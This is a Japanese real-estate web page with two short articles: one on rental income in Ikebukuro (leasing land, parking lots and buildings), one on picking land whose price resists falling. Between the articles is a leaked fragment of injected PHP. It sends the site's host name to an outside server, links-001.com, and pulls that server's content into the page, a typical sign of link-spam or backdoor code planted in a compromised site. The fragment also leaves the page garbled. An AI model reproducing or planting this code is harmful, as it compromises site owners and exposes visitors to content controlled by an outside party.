前へ
次へ

池袋の不動産収入の特色

池袋の不動産収入は、基本的には賃貸収入で得るのが一般的です。
また、賃貸収入は土地を貸すことによって得るのが最も基本的で楽な方法です。
しかし、賃貸収入には土地を貸すことによって得られるものだけでなく、駐車場を作って貸し出したり、賃貸物件を建てて入居者に貸すという方法もあります。
物件を建てて入居者に貸す方法では、土地の所有者が自分の意思でどのような物件を建てるか、どこに建てるか、どのように貸し出すのかなどを判断することができます。
賃貸による池袋の不動産収入は駐車場や建物などの初期費用がかかるものの、その後の費用はあまりかからず安定した収入が見込めるという点に特徴があります。
ちなみに、借主の費用によって建物を建てる場合、借地権が発生して土地の所有者の自由にならない場合もあるのが注意点です。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

池袋の不動産投資には値下がりしにくい土地を選ぶこと

池袋の不動産投資は、家賃収入に頼る状態では、十年、二十年といった長期のスパンで考えることになります。
しかし、単純に持ち続けるだけではなく、最終的には売却するということも考慮しておく必要があります。
そのためには、先ずは値下がりのしにくい土地を選ぶことです。
値下がりのしにくい土地とは、多くの人から需要がある土地です。
つまり、都市部近郊で交通アクセスがよく、周辺環境のよいエリアです。
こうしたエリアの場合いは、比較的土地の価格が安定していることが多く、価格が下がりにくいのです。
そのため、賃料水準も高く、池袋の不動産投資の収益も高く得ることが期待できます。
このように、不動産投資において値下がりしにくい土地というのは、外すことができない条件なのです。

Page Top